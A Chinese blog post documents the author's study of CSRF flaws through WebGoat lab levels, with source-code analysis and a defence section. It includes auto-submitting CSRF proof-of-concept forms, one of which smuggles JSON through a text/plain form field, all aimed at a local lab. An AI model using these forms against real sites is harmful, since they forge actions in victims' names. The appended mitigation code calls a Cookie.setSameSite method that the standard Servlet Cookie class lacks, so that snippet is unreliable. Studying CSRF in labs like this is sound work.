Java代码审计安全篇-CSRF漏洞

前言:


 堕落了三个月,现在因为被找实习而困扰,着实自己能力不足,从今天开始 每天沉淀一点点 ,准备秋招 加油

注意:


本文章参考qax的网络安全java代码审计和部分师傅审计思路以及webgoat靶场,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误

CSRF漏洞

CSRF全称(Cross-Site Request Forgery)漏洞,中文名称为跨站请求伪造,指网站的功能存在缺陷,可允许攻击者预先构造请求诱导其他用户提交该请求并产生危害

跨站点请求伪造是对 Web 浏览器的“混淆代理”攻击。CSRF通常具有以下特征:

  • 它涉及依赖于用户身份的网站。

  • 它利用了网站对该身份的信任。

  • 它诱使用户的浏览器向目标站点发送 HTTP 请求。

  • 它涉及具有副作用的 HTTP 请求。

CSRF 攻击以/滥用基本 Web 功能为目标。如果网站允许,这会导致服务器上的状态发生变化,例如更改受害者的电子邮件地址或密码,或购买 东西。强制受害者检索数据不会使攻击者受益,因为攻击者不会收到响应,而受害者会收到响应。 因此,CSRF 攻击以状态更改请求为目标。 

 Webgoat靶场实战

第一种:敏感功能缺乏CSRF防护机制
0x03

 提交抓包获取

像这种抓包没有发现Token或者验证码的 很容易出现CSRF漏洞 而且只有Referer防护措施, 我们只需测试Referer字段就可以了

这里利用方式有 好几种,我们直接可以利用BP里面的一键生成CSRF payload功能

利用burp直接generate csrf poc,然后点击Test in browser就可以模拟一次csrf攻击了。

 

表单代码

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag" method="POST">
      <input type="hidden" name="csrf" value="false" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;æ&#159;&#165;è&#175;&#162;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

此时Burpsuite生成了一个POC(一个HTML页面),并将自己作为一个web服务器(恶意Web服务器B),浏览器通过生成的URL即可访问页面 ,若可信任服务器正常响应这个请求,说明漏洞利用成功

 利用成功,说明存在CSRF漏洞 

 

我们根据地址查看源码CSRFGetFlag.java

@PostMapping(
      path = "/csrf/basic-get-flag",
      produces = {"application/json"})
  @ResponseBody
  public Map<String, Object> invoke(HttpServletRequest req) {

    Map<String, Object> response = new HashMap<>();

    String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
    String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
    String[] refererArr = referer.split("/");

    if (referer.equals("NULL")) {
      if ("true".equals(req.getParameter("csrf"))) {
        Random random = new Random();
        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
        response.put("success", true);
        response.put("message", pluginMessages.getMessage("csrf-get-null-referer.success"));
        response.put("flag", userSessionData.getValue("csrf-get-success"));
      } else {
        Random random = new Random();
        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
        response.put("success", true);
        response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
        response.put("flag", userSessionData.getValue("csrf-get-success"));
      }
    } else if (refererArr[2].equals(host)) {
      response.put("success", false);
      response.put("message", "Appears the request came from the original host");
      response.put("flag", null);
    } else {
      Random random = new Random();
      userSessionData.setValue("csrf-get-success", random.nextInt(65536));
      response.put("success", true);
      response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
      response.put("flag", userSessionData.getValue("csrf-get-success"));
    }

    return response;
  }
}

首先看这个

 String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
    String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
    String[] refererArr = referer.split("/");//使用"/"字符将referer字符串拆分为字符串数组refererArr。

检查请求头中的"host"和"referer"字段是否存在,并将它们的值分别存储在量"host"和"referer"中。如果值为null,则将其设置为字符串"NULL"。 

我们直接看到下面这行代码

else if (refererArr[2].equals(host)) {
    // 请求来自原始主机
    response.put("success", false);
    response.put("message", "Appears the request came from the original host");
    response.put("flag", null);
}

如果referer不为"NULL",则检查referer的第二个元素(即主机名)是否等于host。如果相等,表示请求来自于原始主机,设置响应的属性来指示请求无效。 

else {
    Random random = new Random();
    userSessionData.setValue("csrf-get-success", random.nextInt(65536));
    response.put("success", true);
    response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
    response.put("flag", userSessionData.getValue("csrf-get-success"));
}

如果referer不为"NULL"且不是来自原始主机,则生成一个随机数并将其放入用户会话数据中,然后设置响应的属性。 

这里也就对应了上边host地址和Referer不一样的原因

其实有个更快捷的方法,根据代码分析 如果referer不为"NULL"且不是来自原始主机,则生成一个随机数并将其放入用户会话数据中,然后设置响应的属性。就是直接修改Referer的值就可以实现CSRF

0x04

这一关其实跟上关差不多 一样方法

源代码ForgedReviews.java

 if (referer != "NULL" && refererArr[2].equals(host)) {
      return failed(this).feedback("csrf-same-host").build();
    } else {
      return success(this)
          .feedback("csrf-review.success")
          .build(); // feedback("xss-stored-comment-failure")
    }

只要判定referer不为空且 则检查referer的第二个元素(即主机名)是否等于host就触发CSRF漏洞了

第二种:网站可允许写入 CSRF payload 
0x07 

我们随便输入抓包得到

POST提交的数据类型为JSON  根据题目的意思就是进行跨域请求了

那么关于JSON的跨域请求可以参考下边这篇文章

https://www.secpulse.com/archives/61297.html

题目是没有验证Content-type

 

那我们可以使用form表单提交来实现跨域请求

 可以参考 

https://blog.csdn.net/haochangdi123/article/details/104812970

 

我们可以构造利用上传html文件进行请求,实现跨域。 

<html>
<form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
<input type="hidden" name='{"name": "Testf", "email": "teddst1233@163.com", "subject": "service", "message":"' value='dsaffd"}'>
</form>
<script>document.attack.submit();
</script>
</html>

这里的关键也就是上文所说的将 json拼接在input属性中,也就是下面这行: 

构造出的POST数据为

{name: "Testf", email: "teddst1233@163.com", message: "=dsaffd"}

这就是为什么如果只将json放在name里,不写value值的话,json数据末尾会多一个=,自然也就无法解析成功了。 

然后打开重新登入之后就利用成功了

原理是请求wolf返回的html,向webgoat发送了请求提交了表单。该请求的origin和referer都是wolf的地址,所以实现了跨域请求。   

我们查看源码

@PostMapping(
      value = "/csrf/feedback/message",
      produces = {"application/json"})
  @ResponseBody
  public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
    try {
      objectMapper.enable(DeserializationFeature.FAIL_ON_IGNORED_PROPERTIES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_NUMBERS_FOR_ENUMS);
      objectMapper.enable(DeserializationFeature.FAIL_ON_READING_DUP_TREE_KEY);
      objectMapper.enable(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_TRAILING_TOKENS);
      objectMapper.readValue(feedback.getBytes(), Map.class);
    } catch (IOException e) {
      return failed(this).feedback(ExceptionUtils.getStackTrace(e)).build();
    }
    boolean correctCSRF =
        requestContainsWebGoatCookie(request.getCookies())
            && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
    correctCSRF &= hostOrRefererDifferentHost(request);
    if (correctCSRF) {
      String flag = UUID.randomUUID().toString();
      userSessionData.setValue("csrf-feedback", flag);
      return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
    }
    return failed(this).build();
  }

  

重点看下面这段

  boolean correctCSRF =
        requestContainsWebGoatCookie(request.getCookies())
            && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
//执行第一个CSRF检查条件:

检查请求中是否包含名为"WebGoatCookie"的Cookie。requestContainsWebGoatCookie(request.getCookies())方法用于检查是否存在该Cookie。
检查请求的内容类型是否包含"text/plain"。request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE)用于检查内容类型。
如果上述两个条件均满足,则将correctCSRF保持为true,否则将其设置为false


 correctCSRF &= hostOrRefererDifferentHost(request);
//执行第二个CSRF检查条件:

调用hostOrRefererDifferentHost(request)方法,该方法用于检查请求的"host"和"referer"字段是否来自不同的主机。
如果"host"和"referer"字段来自不同的主机,则将correctCSRF保持为true,否则将其设置为false。
  

如果都为真就进入下边

if (correctCSRF) {
      String flag = UUID.randomUUID().toString();
      userSessionData.setValue("csrf-feedback", flag);
      return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
    }
    return failed(this).build();
  • 如果correctCSRFtrue,表示通过了CSRF检查。生成一个随机的UUID作为"csrf-feedback"的值,并将其存储到"userSessionData"中。

所以我们能得到一个随机flag

通过源码分析 我们就可以直接利用上面分析出来的漏洞

1. content-type 的值要为 text/plain

2.Host和Referer的字段来自不同的主机

3.请求要携带wengoatCookie

所以我们直接利用就发现了CSRF漏洞 

防护

1. 在敏感请求提交的表单中加入随机的Token或验证码,防止攻击者预测 

2.合理校验请求的Referer,判断请求是否来自本站或其他授权的域名,还需预防写入CSRF paylaod攻击,这就需要禁止用户自定义任意标签的链接属性

3.spring 和 默认情况下,Tomcat 会启用此功能。 

4.阻断CSRF攻击源头,尽量避免在页面提供可被任意用户篡改的链接

  • 15
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
### 回答1: Java代码可以使用以下方法来解决网络安全CSRF问题: 1. 在表单中添加CSRF令牌。在表单提交之前,应该为用户分配一个随机的CSRF令牌,并将其存储在服务器上。当用户提交表单时,该令牌应该与表单数据一起提交。服务器可以检查令牌的有效性,并防止恶意攻击者提交伪造的表单。 以下是一个示例代码: ``` //生成随机的CSRF令牌 String token = UUID.randomUUID().toString(); //将令牌存储在用户会话中 session.setAttribute("csrfToken", token); //在表单中添加CSRF令牌 <form action="/submit-form" method="post"> <input type="hidden" name="csrfToken" value="<%= token %>"> <!-- 其它表单元素 --> <input type="submit" value="提交表单"> </form> //检查CSRF令牌的有效性 protected boolean isValidCsrfToken(HttpServletRequest request) { HttpSession session = request.getSession(); String token = (String) session.getAttribute("csrfToken"); String requestToken = request.getParameter("csrfToken"); return token != null && token.equals(requestToken); } ``` 2. 防止跨域请求。可以使用Java Servlet规范中的SameSite属性来限制Cookie的发送。将SameSite属性设置为"strict"或"Lax"可以防止跨域请求。 以下是一个示例代码: ``` //设置SameSite属性为Lax Cookie cookie = new Cookie("session-id", sessionId); cookie.setPath("/"); cookie.setHttpOnly(true); cookie.setSameSite(Cookie.SameSite.Lax); response.addCookie(cookie); ``` 3. 使用验证码。如果表单中包含敏感数据或操作,则可以使用验证码来确保用户是人类而不是机器。验证码可以防止恶意攻击者使用自动化程序提交表单。 以上是几种常用的防止CSRF攻击的方法,可以在Java代码中使用。 ### 回答2: CSRF(Cross-site Request Forgery)是一种网络安全攻击,攻击者利用用户在已认证的网站上执行非自愿的操作。为了解决这个问题,可以采取以下的Java代码实现: 1. 随机生成并保存一个CSRF令牌(Token)到用户的会话(Session)中。 ```java String token = generateToken(); // 生成CSRF令牌 request.getSession().setAttribute("csrfToken", token); // 将令牌保存到会话中 ``` 2. 在用户执行重要操作之前,将该CSRF令牌添加到表单中。 ```html <form action="/submit" method="post"> <input type="hidden" name="csrfToken" value="${sessionScope.csrfToken}"> <!-- 表单其他字段 --> <input type="submit" value="提交"> </form> ``` 3. 在服务器端验证提交请求中的CSRF令牌是否与会话中保存的令牌相同。 ```java String csrfToken = request.getParameter("csrfToken"); // 获取提交请求中的令牌 String sessionToken = (String) request.getSession().getAttribute("csrfToken"); // 获取会话中的令牌 if (csrfToken == null || !csrfToken.equals(sessionToken)) { // 令牌不匹配,拒绝请求或采取其他处理 return; } // 令牌匹配,继续处理请求 ``` 通过以上的实现,我们可以有效地防止CSRF攻击。当用户发起操作时,我们在会话中生成一个随机的CSRF令牌,并将其添加到表单中。在服务器端接收到请求时,我们会从提交请求中获取令牌并与会话中保存的令牌进行比较,如果两者一致,则表明请求是合法的;如果不一致,则很可能是恶意的请求,我们可以拒绝该请求或采取其他适当的处理措施。 这样做的好处是,即使攻击者能够诱导用户点击恶意链接或图片,但由于缺乏正确的CSRF令牌,攻击者无法成功发起合法请求。因此,我们可以保障用户的安全和数据的完整性。 ### 回答3: CSRF(Cross-Site Request Forgery)指的是攻击者利用受害者的身份在受信任的网站上执行未经授权的操作。为了解决这个问题,我们可以在Java代码中采取以下措施: 1. 随机令牌(CSRF Token):在每个与服务器的请求中,包括表单提交和AJAX请求,都生成一个随机令牌。该令牌仅存储在会话中,并在生成的HTML表单中包含一个隐藏字段。服务器在处理请求时验证令牌的有效性,如果令牌不存在或无效,则拒绝请求。 2. 双重提交cookie:每当生成随机令牌时,将其存储在会话中,并将其同时设置为一个cookie,以便每个请求都包含此cookie。服务器在收到请求时,比较表单中的令牌与cookie中的令牌,如果不匹配,则拒绝请求。 3. SameSite属性:将cookie的SameSite属性设置为Strict。这样,浏览器将只在用户直接导航到网站时包含cookie,阻止来自其他网站的跨站请求。 4. 验证来源(Referer)头:服务器验证请求的Referer头,确保请求来自相同的源或受信任的源。阻止来自其他网站的跨站请求。 5. 验证请求方法:对于敏感操作,例如修改、删除数据,仅接受POST请求。防止攻击者通过GET请求进行滥用。 通过以上措施,我们能够在Java代码中有效地解决CSRF问题。这些措施可以在服务器端实施,确保请求的有效性,并防止攻击者利用受信任的用户身份进行未经授权的操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值